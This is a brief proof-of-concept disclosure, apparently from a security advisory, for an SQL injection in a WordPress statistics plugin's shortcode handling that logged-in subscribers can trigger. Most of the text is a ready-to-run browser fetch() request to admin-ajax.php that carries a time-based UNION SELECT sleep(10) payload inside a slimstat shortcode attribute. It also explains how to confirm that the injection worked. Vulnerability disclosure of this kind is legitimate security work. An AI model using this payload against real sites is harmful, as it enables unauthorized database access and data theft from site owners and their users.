The plugin does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.
While logged in as a subscriber, send the following request:
(await fetch('/wp-admin/admin-ajax.php',{method:'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'},body:'action=parse-media-shortcode&shortcode=[slimstat f="count" w="author"]WHERE:1 UNION SELECT sleep(10)-- a[/slimstat]'})).text()
If successful, the request should hang for ~10 seconds, indicating we successfully injected something in the affected SQL query.